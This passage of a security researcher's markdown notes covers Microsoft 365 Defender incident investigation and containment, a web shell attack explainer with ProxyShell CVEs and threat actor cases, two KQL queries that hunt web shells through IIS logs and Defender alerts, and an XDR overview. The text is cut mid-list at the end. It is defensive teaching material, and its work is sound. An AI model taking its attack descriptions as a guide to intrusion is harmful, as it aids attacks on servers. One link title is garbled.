79 | March 4, 2021, [GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence](https://www.microsoft.com/en-us/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/)
80 | May 27, 2021, [New sophisticated email-based attack from NOBELIUM](https://www.microsoft.com/en-us/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/)
81 | May 28, 2021, [BNew sophisticated email-based attack from NOBELIUMreaking down NOBELIUM’s latest early-stage toolset](https://www.microsoft.com/en-us/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/)
82 | September 27, 2021, [FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor](https://www.microsoft.com/en-us/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/)
83 | October 25, 2021, [NOBELIUM targeting delegated administrative privileges to facilitate broader attacks](https://www.microsoft.com/en-us/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/)
84 | February 8, 2023, [Solving one of NOBELIUM’s most novel attacks: Cyberattack Series](https://www.microsoft.com/en-us/security/blog/2023/02/08/solving-one-of-nobeliums-most-novel-attacks-cyberattack-series/) 85 | 86 | 87 | ### Decoding NOBELIUM blog : 88 | 1. [How nation-state attackers like NOBELIUM are changing cybersecurity](https://www.microsoft.com/en-us/security/blog/2021/09/28/how-nation-state-attackers-like-nobelium-are-changing-cybersecurity/) 89 | 2. [The hunt for NOBELIUM, the most sophisticated nation-state attack in history](https://www.microsoft.com/en-us/security/blog/2021/11/10/the-hunt-for-nobelium-the-most-sophisticated-nation-state-attack-in-history/) 90 | 3. [Behind the unprecedented effort to protect customers against the NOBELIUM nation-state attack](https://www.microsoft.com/en-us/security/blog/2021/12/02/behind-the-unprecedented-effort-to-protect-customers-against-the-nobelium-nation-state-attack/) 91 | 4. [The final report on NOBELIUM’s unprecedented nation-state attack](https://www.microsoft.com/en-us/security/blog/2021/12/15/the-final-report-on-nobeliums-unprecedented-nation-state-attack/) 92 | 93 | #### Disclaimer 94 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 95 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day10-XDR-Insights-part2.md: -------------------------------------------------------------------------------- 1 | # Day 10 - XDR Incident Investigation insights 2 | When organizations purchase E5 security, their first challenge is often product deployment. However, ***the next significant challenge arises in "security operations"***, particularly dealing with daily incident response. While Microsoft provides detailed insights and various features, SOC teams might feel overwhelmed when alerts and incidents are generated in their environment. 3 | 4 | When alerts/incidents were generated in your tenant, some people may have the following concerns and challenges. 5 | 6 | 1. ***No idea where to start the investigation...*** 7 | 2. ***Where exactly do I have to look ?*** 8 | 3. ***What kind of options do I have ?*** 9 | 4. ***What capabilities can I leverage in XDR ?*** 10 | 11 | 12 | In light of this, I aim to expand their understanding in ***XDR*** and ***Microsoft 365 Defender*** to help them overcome these challenges. 13 | Therefore, in this blog, I am going to explore the power of XDR, Microsoft 365 Defender and now let's start with Part 1. 14 | 15 | | # | Title | About | 16 | |:-----|:----- |:------| 17 | |1 | [XDR overview](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day9-XDR-Insights-part1.md) | This blog is for people who are not aware of XDR.
It aims to start the journey of exploring XDR, specifically Microsoft 365 Defender. | 18 | |2 | XDR Incident Investigation ****** | This blog focuses on Incident Response in the Microsoft 365 Defender portal.
Part 1 covers the fundamentals, while ***Part 2 delves into core incident investigation.*** | 19 | 20 | 21 | ## Incident Investigation in Microsoft 365 Defender 22 | 23 | To effectively utilize Microsoft 365 Defender, please keep in mind the following two concepts when you receive alerts and incidents in your tenant. 24 | 25 | | # | Step | ToDo | 26 | |:-----|:------------|:------------------------------------------------------------| 27 | | 1 | Investigate | - Contain compromised assets
- Investigate incidents | 28 | | 2 | Response | - Eradication & Recovery
- Extend investigation | 29 | 30 | 31 | ### 1. Investigate 32 | When alerts/incidents were generated in your tenant, firstly what you have to do is to understand ***a holistic view of the generated incident***. 33 | - [ ] Confirm how and where the attack started. 34 | - [ ] How far the attack has gone into your tenant. 35 | - [ ] Identify & Contain compromised assets, such as devices, users, mailboxes, apps and more. 36 | 37 | 38 | > [!Warning] 39 | > Instead of looking at the alert page initially, focus on ***the incident page***. This is because numerous alerts may not be mapped as a single incident, potentially overwhelming the SOC team. 40 | 41 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7df02513-bc93-430b-8aac-a4f57b4287fb) 42 | 43 | #### @ Confirm how and where the attack started ? 44 | #### @ How far the attack has gone into your tenant ? 45 | 46 | When it comes to **"Investigation"**, it's important to grasp a holistic view of the generated incident. 47 | ***In other words, you don't need to deeply understand the detailed information of processes, files, registries, and device activities originating from individual alerts at this stage.*** 48 | This provides preliminary and useful information before proceeding with actions in the containment process. 49 | 50 | The following are important checkpoints to understand the holistic view of the incident. 51 | 52 | 53 | | Points | Details | 54 | |:---------------|:------------| 55 | | Incident Title |Title is the primary element that helps you upon opening an incident. It assists in grasping a concise overview of the incident. For instance, 'Multi-stage incident involving initial access & Command and Control on Multiple endpoints.' This title helps you envision a scenario where two attack techniques are observed on multiple devices.| 56 | | Alerts |This is the best place for tracking the timeline of alerts within the incident, particularly when investigating the breach's initiation. These alerts offer insights into the initial stages of the breach, including details about how and where the compromise originated.| 57 | | Incident graph |This incident graph visualizes the maximum level of relationships, such as alerts associated with the incident and entities linked to those alerts. Therefore, by simultaneously viewing this incident graph along with incident titles and alerts, it helps in comprehending and understanding the overall picture of what is happening within the incident. | 58 | 59 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e8baebb1-9f61-4cd3-9e21-b45e2f42db84) 60 | > Incidents page -> [Attack story] 61 | 62 | 63 | | Points | Details | 64 | |:----------------------|:------------| 65 | | Alerts and categories | Alerts and categories provide you not only with alerts in chronological order, but also with MITRE ATT&CK tactics. Thanks to MITRE ATT&CK, the SOC team can envision the scope of this attack and more, including how it has spread across different areas.| 66 | | Scope | Within the scope, this provides information about impacted assets, such as devices, user accounts, mailboxes, and applications. This information aids in determining the subsequent steps, such as containment to stop the ongoing attack and mitigate its impact.| 67 | 68 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b6343960-d273-4c1f-855d-c747a2e8390f) 69 | 70 | > Incidents page -> [Summary] 71 | 72 | #### @ Identify & Contain compromised assets, such as devices, users, mailboxes, apps and more 73 | Once you find the compromised asset, you have to take containment actions to stop the ongoing attack. I have summarized several containment-related actions within Microsoft 365 Defender as follows. 74 | 75 | | Asset | Action | 76 | |:--------|:--------| 77 | | Devices | - [Initiate Live Response Session](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/live-response?view=o365-worldwide)
- ***[Isolate Device](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#isolate-devices-from-the-network)***
- ***[Contain Device](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/respond-machine-alerts?view=o365-worldwide#contain-devices-from-the-network)*** | | 78 | | User Accounts | [- Suspend user in Azure AD
- Disable user in Active Directory
- Reset user password](https://learn.microsoft.com/en-us/defender-for-identity/remediation-actions) | 79 | 80 | > [!Important] 81 | > #### Automatic attack disruption 82 | > While the above actions are performed manually, in cases where advanced attacks such as AiTM, BEC, and Human-operated ransomware are detected in Microsoft 365 Defender, [Automatic attack disruption feature](https://learn.microsoft.com/en-us/microsoft-365/security/defender/automatic-attack-disruption?view=o365-worldwide) designed for containment will help you stop the ongoing breach. 83 | > #### Automated investigation and response (AIR) 84 | > As [AIR](https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide) is enabled by default, certain alerts & incidents will be automatically investigated and remediated. This process is primarily triggered when an alert is detected in your tenant, but there is also a manual option. If needed, you can initiate AIR. 85 | 86 | 87 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3379a4c5-7a86-45fb-9176-88344aceefe5) 88 | > e.g. Device actions 89 | 90 | 91 | Isolating the device from the internet is highly critical to minimize the impact on the endpoint. Once the internet connection is disabled, the SOC team can allocate time for in-depth investigation and proceed with eradication tasks, such as removing malicious files, deleting registry keys, terminating processes, and more. 92 | 93 | Resetting passwords is a highly effective method to prevent unauthorized access by attackers. Additionally, disabling Azure AD user accounts and on-premises AD accounts are powerful actions that effectively cut off access to their associated resources. 94 | 95 | **Custom detection rules** 96 | 97 | While this topic may slightly differ from containment in incident response, I also want to introduce the concept of [custom detection rules](https://learn.microsoft.com/en-us/microsoft-365/security/defender/custom-detection-rules?view=o365-worldwide). 98 | If there are specific activities ***you wish to monitor or track***, you can write a KQL query in Advanced Hunting and create custom detection rules. 99 | An advantageous aspect is that when the rule (KQL query) corresponds to matched data within your tenant's activities, it can trigger actions aimed at the relevant asset. 100 | 101 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/a0903dcf-d9ad-494f-b07f-35cb48c737ba) 102 | > KQL query -> custom detection rules in Advanced Hunting 103 | 104 | 105 | > [!Note] 106 | > In the beginning, we usually initiate the process of identifying the incident to classify whether it is a false positive or true positive. If it is indeed a true positive, we delve into the incident to gain a comprehensive overview and identify compromised assets before moving on to containment. Following containment, we isolate or shut down the asset to halt the ongoing attack. The subsequent steps involve further investigation, eradication, remediation, and more. I hope I can share a story about further investigation and eradication in the next part of the blog. 107 | 108 | ## Reference 109 | - [Incident response with Microsoft 365 Defender | Overview](https://learn.microsoft.com/en-us/microsoft-365/security/defender/incidents-overview?view=o365-worldwide) 110 | - June 10, 2020, [Inside Microsoft 365 Defender: Attack modeling for finding and stopping lateral movement](https://www.microsoft.com/en-us/security/blog/2020/06/10/the-science-behind-microsoft-threat-protection-attack-modeling-for-finding-and-stopping-evasive-ransomware/) 111 | - June 18, 2020, [Inside Microsoft 365 Defender: Mapping attack chains from cloud to endpoint](https://www.microsoft.com/en-us/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/) 112 | - July 9, 2020, [Inside Microsoft 365 Defender: Correlating and consolidating attacks into incidents](https://www.microsoft.com/en-us/security/blog/2020/07/09/inside-microsoft-threat-protection-correlating-and-consolidating-attacks-into-incidents/) 113 | - July 29, 2020, [Inside Microsoft 365 Defender: Solving cross-domain security incidents through the power of correlation analytics](https://www.microsoft.com/en-us/security/blog/2020/07/29/inside-microsoft-threat-protection-solving-cross-domain-security-incidents-through-the-power-of-correlation-analytics/) 114 | 115 | #### Disclaimer 116 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 117 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day08-WebShell-Insights-XDR.md: -------------------------------------------------------------------------------- 1 | # Day 8 - Web shell attack insights 2 | Web shell is a malicious software tool that hackers use to gain unauthorized access to a website or web server. It is like a "backdoor" that allows them to control and manipulate the website remotely. 3 | 4 | Once the hackers have installed a web shell on a website, they can perform various malicious activities as follows. 5 | - Upload, download, and modify files on the website 6 | - Execute commands on the server, giving them control 7 | - Steal sensitive information from the website or server 8 | - Deface the website by changing its appearance 9 | - Launch additional attacks or use the compromised server for illegal activities 10 | 11 | **MITRE ATT&CK** 12 | 13 | Persistence > Server Software Component, ***T1505.003, [Web Shell](https://attack.mitre.org/techniques/T1505/003/)*** 14 | 15 | ### Web shell diagram 16 | 17 | 18 | > [!Note] 19 | > Web shell attacks are on the rise worldwide. Join this session with Microsoft Security Research to investigate a real-world web shell attack, and how Threat Protection security solutions from Microsoft detect and respond to it. 20 | > 21 | > [Web shell attack deep dive](https://www.youtube.com/watch?v=jvGUahJGJnY), Microsoft Security 22 | 23 | ### Programming language 24 | A web shell is a malicious code implanted on web servers, written in web development programming languages like ... 25 | 26 | ***ASP, PHP, JSP,*** Python, Perl, Bash 27 | 28 | ### Entry points (web shell installation) 29 | Web Shells are installed through: 30 | 31 | 1. Exploiting ***vulnerabilities*** on Internet-facing web servers. 32 | 2. Exploiting ***misconfigurations or weak configurations*** on Internet-facing web servers. 33 | 34 | **E.g.** SQL injection, Cross-site scripting (XSS), Local File Inclusion (LFI), Remote file inclusion (RFI), ***Unpatched Internet-facing web servers*** 35 | 36 | ## Web Shell breach 37 | Web shells are commonly leveraged by attackers as an initial access in various types of attacks. Let me introduce some attack scenarios involving the use of web shells. 38 | 39 | ### A BlackByte ransomware 40 | In this attack, the attacker utilized a variety of tools and techniques to carry out their objective of deploying BlackByte 2.0 ransomware. They gained initial access by exploiting [ProxyShell vulnerabilities](https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705) and targeted unpatched Microsoft Exchange Servers to install the web shell. 41 | 42 | **ProxyShell** : refers to three Exchange vulnerabilities discovered and patched by Microsoft in 2021. When combined, these flaws enable unauthenticated remote code execution, granting attackers full control over the Exchange server and potential access to other parts of the organization's network. 43 | 44 | | CVE | MSRC - Microsoft Exchange Server | NVD / NIST | 45 | |:---------------|:-------|:----------| 46 | | CVE-2021-34473 | [Remote Code Execution Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473) | [CVE-2021-34473 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-34473) | 47 | | CVE-2021-34523 | [Elevation of Privilege Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523) | [CVE-2021-34523 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-34523) | 48 | | CVE-2021-31207 | [Security Feature Bypass Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207) | [CVE-2021-31207 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-31207) | 49 | 50 | 51 | 52 | > July 6, 2023, [The five-day job: A BlackByte ransomware intrusion case study](https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/) 53 | 54 | ### Cadet Blizzard 55 | Cadet Blizzard, a Russian GRU-sponsored threat group, carried out attacks on several government agencies in Ukraine in mid-January 2022, causing significant disruptions and destructive events. 56 | 57 | As the initial access method, Cadet Blizzard employed the web shell technique by exploiting vulnerabilities in Confluence servers([CVE-2021-26084](https://nvd.nist.gov/vuln/detail/CVE-2021-26084)), Exchange servers (including [CVE-2022-41040](https://nvd.nist.gov/vuln/detail/CVE-2022-41040) and ProxyShell), and likely commodity vulnerabilities in various open-source platforms like content management systems. 58 | 59 | 60 | 61 | 62 | > June 14, 2023, [Cadet Blizzard emerges as a novel and distinct Russian threat actor](https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/) 63 | 64 | ### Ghost in the shell 65 | 66 | As web shell attacks continue to increase, exploiting misconfigurations and vulnerabilities, Microsoft security team is actively investigating the matter and offering in-depth insights in their blog. Microsoft stated that the attack kill chain is ***"one of increasingly more common incidents of web shell attacks affecting multiple organizations in various sectors"***. 67 | 68 | These nation-state cyberattacks have utilized web shells as the initial access point in their campaigns. 69 | 70 | | Threat Actor | Comment | 71 | |:-------------|:--------| 72 | | [Diamond Sleet (ZINC)](https://www.microsoft.com/en-us/security/blog/2021/01/28/zinc-attacks-against-security-researchers/) | North Korea-based activity group | 73 | | [Secret Blizzard (KRYPTON)](https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims)| Russia-based activity group | 74 | | [Granite Typhoon (GALLIUM)](https://www.microsoft.com/en-us/security/blog/2019/12/12/gallium-targeting-global-telecom/) | China-based activity group | 75 | 76 | 77 | 78 | > February 4, 2020, [Ghost in the shell: Investigating web shell attacks](https://www.microsoft.com/en-us/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/) 79 | 80 | ## KQL : Threat Hunting 81 | Regarding KQL threat hunting, I came across some amazing blogs that focus on web shell hunting. Let me introduce them here. 82 | 83 | 84 | #### Web Shell Attack on Sharepoint Server Exploiting CVE-2019-0604 85 | This query is designed to track web shell installation activities on a Sharepoint Server by combining the W3CIISLog table and the SecurityAlert table, which originates from Microsoft Defender for Endpoint alerts. 86 | ```kql 87 | let alertTimeWindow = 1h; 88 | let logTimeWindow = 7d; 89 | // Define script extensions that suit your web application environment - a sample are provided below 90 | let scriptExtensions = dynamic([".php", ".jsp", ".js", ".aspx", ".asmx", ".asax", ".cfm", ".shtml"]); 91 | let alertData = SecurityAlert 92 | | where TimeGenerated > ago(alertTimeWindow) 93 | | where ProviderName == "MDATP" 94 | // Parse and expand the alert JSON 95 | | extend alertData = parse_json(Entities) 96 | | mvexpand alertData; 97 | let fileData = alertData 98 | // Extract web script files from MDATP alerts - our malicious web scripts - candidate web shells 99 | | where alertData.Type =~ "file" 100 | | where alertData.Name has_any(scriptExtensions) 101 | | extend FileName = tostring(alertData.Name), Directory = tostring(alertData.Directory); 102 | let hostData = alertData 103 | // Extract server details from alerts and map to alert id 104 | | where alertData.Type =~ "host" 105 | | project HostName = tostring(alertData.HostName), DnsDomain = tostring(alertData.DnsDomain), SystemAlertId 106 | | distinct HostName, DnsDomain, SystemAlertId; 107 | // Join the files on their impacted servers 108 | let webshellData = fileData 109 | | join kind=inner (hostData) on SystemAlertId 110 | | project TimeGenerated, FileName, Directory, HostName, DnsDomain; 111 | webshellData 112 | | join ( 113 | // Find requests that were made to this file on the impacted server in the W3CIISLog table 114 | W3CIISLog 115 | | where TimeGenerated > ago(logTimeWindow) 116 | // Restrict to accesses to script extensions 117 | | where csUriStem has_any(scriptExtensions) 118 | | extend splitUriStem = split(csUriStem, "/") 119 | | extend FileName = splitUriStem[-1], HostName = sComputerName 120 | // Summarize potential attacker activity 121 | | summarize count(), StartTime=min(TimeGenerated), EndTime=max(TimeGenerated), RequestUserAgents=make_set(csUserAgent), ReqestMethods=make_set(csMethod), RequestStatusCodes=make_set(scStatus), RequestCookies=make_set(csCookie), RequestReferers=make_set(csReferer), RequestQueryStrings=make_set(csUriQuery) by AttackerIP=cIP, SiteName=sSiteName, ShellLocation=csUriStem, tostring(FileName), HostName 122 | ) on FileName, HostName 123 | | project StartTime, EndTime, AttackerIP, RequestUserAgents, SiteName, ShellLocation, ReqestMethods, RequestStatusCodes, RequestCookies, RequestReferers, RequestQueryStrings, RequestCount = count_ 124 | // Expose the attacker ip address as a custom entity 125 | | extend timestamp=StartTime, IPCustomEntity = AttackerIP 126 | ``` 127 | > Jun 09 2020, [Web shell threat hunting with Azure Sentinel and Microsoft Threat Protection](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel-and-microsoft/ba-p/1448065) 128 | 129 | 130 | #### Web Shell Attack on Exchange servers exploiting vulnerabilities - [Silk Typhoon (HAFNIUM)](https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/) 131 | This query is designed to track web shell installation activities on an Exchange Server by combining the W3CIISLog table and the SecurityAlert table, which originates from Microsoft Defender for Endpoint alerts. 132 | ```kql 133 | let timeWindow = 3d; 134 | //Script file extensions to match on, can be expanded for your environment 135 | let scriptExtensions = dynamic([".asp", ".aspx", ".asmx", ".asax"]); 136 | SecurityAlert 137 | | where TimeGenerated > ago(timeWindow) 138 | | where ProviderName == "MDATP" 139 | //Parse and expand the alert JSON 140 | | extend alertData = parse_json(Entities) 141 | | mvexpand alertData 142 | | where alertData.Type == "file" 143 | //This can be expanded to include more file types 144 | | where alertData.Name has_any(scriptExtensions) 145 | | extend FileName = tostring(alertData.Name), Directory = tostring(alertData.Directory) 146 | | project TimeGenerated, FileName, Directory 147 | | join ( 148 | W3CIISLog 149 | | where TimeGenerated > ago(timeWindow) 150 | | where csUriStem has_any(scriptExtensions) 151 | | extend splitUriStem = split(csUriStem, "/") 152 | | extend FileName = splitUriStem[-1] 153 | | summarize StartTime=min(TimeGenerated), EndTime=max(TimeGenerated) by AttackerIP=cIP, AttackerUserAgent=csUserAgent, SiteName=sSiteName, ShellLocation=csUriStem, tostring(FileName) 154 | ) on FileName 155 | | project StartTime, EndTime, AttackerIP, AttackerUserAgent, SiteName, ShellLocation 156 | ``` 157 | > Mar 25 2021, [Web Shell Threat Hunting with Azure Sentinel](https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968) 158 | 159 | 160 | ## Reference 161 | - September 23, 2020, [Web shell attack deep dive | Microsoft Security](https://www.youtube.com/watch?v=jvGUahJGJnY) 162 | - February 11, 2021, [Web shell attacks continue to rise | Microsoft Security blog](https://www.microsoft.com/en-us/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/) 163 | 164 | ## Video 165 | - [Unveiling Webshells: The Stealthy Webserver Malware | Cybersecurity Deep Dive](https://www.youtube.com/watch?v=gJJ-A3YUXG0) by Michael Melone 166 | 167 | #### Disclaimer 168 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 169 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day09-XDR-Insights-part1.md: -------------------------------------------------------------------------------- 1 | # Day 9 - XDR Incident Response insights 2 | When organizations purchase E5 security, their first challenge is often product deployment. However, ***the next significant challenge arises in "security operations"***, particularly dealing with daily incident response. While Microsoft provides detailed insights and various features, SOC teams might feel overwhelmed when alerts and incidents are generated in their environment. 3 | 4 | When alerts/incidents were generated in your tenant, some people may have the following concerns and challenges. 5 | 6 | 1. ***No idea where to start the investigation...*** 7 | 2. ***Where exactly do I have to look ?*** 8 | 3. ***What kind of options do I have ?*** 9 | 4. ***What capabilities can I leverage in XDR ?*** 10 | 11 | 12 | In light of this, I aim to expand their understanding in ***XDR*** and ***Microsoft 365 Defender*** to help them overcome these challenges. 13 | Therefore, in this blog, I am going to explore the power of XDR, Microsoft 365 Defender and now let's start with Part 1. 14 | 15 | | # | Title | About | 16 | |:-----|:----- |:------| 17 | |1 | XDR overview ****** | This blog is for people who are not aware of XDR.
It aims to start the journey of exploring XDR, specifically Microsoft 365 Defender. | 18 | |2 | [XDR Incident Investigation](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day10-XDR-Insights-part2.md) | This blog focuses on Incident Response in the Microsoft 365 Defender portal.
Part 1 covers the fundamentals, while ***Part 2 delves into core incident investigation.*** | 19 | 20 | 21 | 22 | ## What is XDR ? 23 | Extended detection and response describes ***a unified security incident detection and response platform*** that automatically collects and ***correlates data from multiple proprietary security components***. 24 | > Gartner® Innovation Insight for Extended Detection and Response 25 | 26 | ## Gartner® Magic Quadrant™ 27 | Before we dive into the power of XDR and Microsoft 365 Defender in this blog, let's take a fascinating look at the market research results for Endpoint Protection/XDR over the past 2 years. 28 | As shown in the results over the past two years, Microsoft has consistently stayed its position as ***a Leader***. 29 | > [!Important] 30 | > According to [the Gartner report](https://www.gartner.com/doc/reprints?id=1-2AJ91JO6&ct=220707&st=sb) in 2022, Microsoft's highest scores are for its market understanding and overall viability. This reflects the strong performance of its security business and an early move to define and ***evolve the emerging XDR category***. Microsoft achieved this through ***deep integration and automation between Microsoft Defender for Endpoint and other Microsoft products***, particularly Azure Active Directory, enabling an emerging identity threat detection and response (ITDR) capability. 31 | 32 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b4039697-5aec-4d5d-a710-a7fa5310ada6) 33 | 34 | - [Microsoft is named a Leader in the 2022 Gartner® Magic Quadrant™ for Endpoint Protection Platforms](https://www.microsoft.com/en-us/security/blog/2023/03/02/microsoft-is-named-a-leader-in-the-2022-gartner-magic-quadrant-for-endpoint-protection-platforms/) 35 | - [Gartner names Microsoft a Leader in the 2021 Endpoint Protection Platforms Magic Quadrant](https://www.microsoft.com/en-us/security/blog/2021/05/11/gartner-names-microsoft-a-leader-in-the-2021-endpoint-protection-platforms-magic-quadrant/) 36 | 37 | 38 | ## XDR, Microsoft 365 Defender 39 | In Microsoft Security, we have an XDR solution called [Microsoft 365 Defender](https://learn.microsoft.com/en-us/microsoft-365/security/defender/microsoft-365-defender?view=o365-worldwide) 40 | , which provides a wide range of protection, including the following Defender suite: 41 | 42 | | Product | Protection | 43 | |:--------|:--------| 44 | | Microsoft Defender fot Office 365 (MDO) | Email security | 45 | | Microsoft Defender for Cloud Apps (MDA) | App & Data security | 46 | | Microsoft Defender for Endpoint (MDE) | Endpoint security | 47 | | Microsoft Defender for Identity (MDI) | On-premise-based identity security | 48 | | Microsoft Entra ID Protection | Cloud-based identity security | 49 | 50 | ### XDR advantages in Microsoft 365 Defender 51 | Firstly, there are a number of great features in Microsoft 365 Defender, and I would like to spotlight four pivotal attributes that have the potential to optimize your security operations, as outlined below: 52 | 1. Combined incidents queue 53 | 2. Automatic attack disruption 54 | 3. Automated investigation and response 55 | 4. Threat Hunting, KQL 56 | 57 | ## Combined incidents queue, XDR 58 | Thanks to the power of XDR, Microsoft 365 Defender incident correlates multiple defender alerts and all affected entities into a cohesive view - ***a single unified incident***. 59 | 60 | [Peach Sandstorm](https://www.microsoft.com/en-us/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/) (previously HOLMIUM) attack is the great example of how Microsoft 365 Defender efficiently detects individual alerts and seamlessly correlates them into a single incident, showcasing the power of XDR. 61 | 62 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/23388f31-bcd3-443a-a6f0-290d89248bc3) 63 | > Peach Sandstorm attack techniques with Microsoft 365 Defender 64 | 65 | As evidenced by the incident below, Microsoft 365 Defender successfully captured HOLMIUM activities and consolidated 10 alerts into a single incident. This streamlined approach empowers the SOC team to readily comprehend affected assets and promptly implement containment measures. Additionally, the Incident view presents the 10 alerts chronologically, enabling the SOC team to discern the attack's progression and origin. 66 | 67 | ![3m0twjyu](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/c4525b0a-1d6b-49e7-90de-08cb07d9f009) 68 | > Peach Sandstorm detection & incident page in Microsoft 365 Defender 69 | 70 | ## Automatic attack disruption 71 | Automatic attack disruption in Microsoft 365 Defender uses XDR signals from different sources (endpoints, email, identity, data) to ***automatically contain compromised assets and stop ongoing cyber attacks, minimizing their impact on organizations***. 72 | 73 | > [!Note] 74 | > What is the objective of attack disruption? - 75 | > The main objective of this feature is to achieve ***containment*** during the incident response phase. In terms of automatic disruption, there are two actions that can be taken: ***"device contain"*** by Microsoft Defender for Endpoint and ***"disable user"*** by Microsoft Defender for Identity. 76 | 77 | Microsoft 365 Defender XDR provides coverage for the following three advanced attacks to disrupt further progression. 78 | 79 | | Advanced attack | Microsoft Security blog | 80 | |:----------------|:------------------------| 81 | | Adversary-in-the-middle attacks (AiTM) | [Automatically disrupt adversary-in-the-middle (AiTM) attacks with XDR](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatically-disrupt-adversary-in-the-middle-aitm-attacks-with/ba-p/3821751)| 82 | | Business email compromise (BEC) | [XDR attack disruption in action – Defending against a recent BEC attack](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/xdr-attack-disruption-in-action-defending-against-a-recent-bec/ba-p/3749822) | 83 | | Human-operated ransomware attacks | [Automatic disruption of Ransomware and BEC attacks with Microsoft 365 Defender](https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/automatic-disruption-of-ransomware-and-bec-attacks-with/ba-p/3738294) | 84 | 85 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8097addd-e570-4bf9-a8f1-be3fa6f456ff) 86 | > Incident view showing the yellow bar where [automatic attack disruption](https://learn.microsoft.com/en-us/microsoft-365/security/defender/automatic-attack-disruption?view=o365-worldwide) took action 87 | 88 | ## Automated investigation and response 89 | 90 | 91 | [Automated investigation and response](https://learn.microsoft.com/en-us/microsoft-365/security/defender/m365d-autoir?view=o365-worldwide) (AIR) in Microsoft 365 Defender significantly enhances security team efficiency by automatically investigating generated incidents and responding to malicious entities. This automated process resolves numerous incidents without any interaction from the security team. 92 | 93 | Once alerts are generated in Microsoft 365 Defender, AIR triggers a playbook, initiates the investigation process, and takes remediation actions for both devices and emails. 94 | 95 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/536b3cef-c0c7-4d57-b7a3-2df762b14596) 96 | > Automated Investigation and Response page in Microsoft 365 Defender portal 97 | 98 | ## Threat Hunting with KQL 99 | [Advanced Hunting](https://learn.microsoft.com/en-us/microsoft-365/security/defender/advanced-hunting-overview?view=o365-worldwide) is an incredible XDR feature within Microsoft 365 Defender. This capability enables us to analyze vast amounts of security-related data across their organization's endpoints, identities, applications, emails, and more by leveraging ***Kusto Query Language*** (KQL). 100 | 101 | > [!Warning] 102 | > The data from all tables remains available for up to **30 days** in Advanced Hunting, Microsoft 365 Defender. If you wish to retain raw data (logs) for more than 30 days, I recommend utilizing [Microsoft Sentinel](https://learn.microsoft.com/en-us/azure/sentinel/overview), which allows you to keep the data for up to **2 years**. 103 | 104 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/e890a657-829d-444d-a369-cceb8b37862f) 105 | > Advanced Hunting page in Microsoft 365 Defender portal 106 | 107 | By combining two different tables from different products, you can gain additional insights. 108 | For instance, when you merge email and identity tables, you can obtain not only information about email cases classified as malware/phishing but also relevant user account details, including city, country, job title, and more. 109 | 110 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/541ad329-b435-45f8-a874-24b37c4ac874) 111 | 112 | 113 | For those interested in learning KQL, recommend the following webinars 114 | 115 | - #### Microsoft 365 Defender / KQL Webcast 116 | This webinar is an excellent resource for those who are new to KQL in Microsoft 365 Defender. Each webinar in the series covers the fundamentals of KQL and demonstrates great use cases. As my work mainly focuses on XDR in Microsoft 365 Defender, I found these webinars particularly helpful and informative. 117 | 118 | 1. [M365 Defender 